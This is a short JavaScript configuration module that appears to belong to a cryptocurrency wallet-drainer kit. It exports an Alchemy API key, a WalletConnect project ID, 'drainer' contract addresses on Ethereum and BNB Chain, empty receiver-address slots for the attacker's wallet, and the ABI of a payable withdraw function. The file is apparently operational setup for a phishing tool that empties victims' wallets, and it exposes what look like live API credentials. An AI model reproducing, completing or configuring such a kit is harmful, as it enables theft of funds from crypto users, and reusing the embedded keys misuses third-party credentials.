export const ALCHEMY_API_KEY="iubbwHNALzLsF3lCKGXmm29C1IWc_bZE";

export const WALLET_CONNECT_PROJECT_ID="eeb69544d7c7d9639cfba9cef3300405";

export const DRAINER_ADDRESS = {
    1: "0xC80bF34dec8CD2CdfF4bc1B835b44F20ABBaa9a1",
    56: "0x9Cc0eC74658513782E5B3a2769469A3E1d9bd9Bb"
};


export const RECEIVER_ADDRESS = {
    1: "",
    56: ""
}

export const DRAINER_ABI = [{"inputs":[{"internalType":"address payable","name":"receiver","type":"address"}],"name":"withdraw","outputs":[],"stateMutability":"payable","type":"function"}];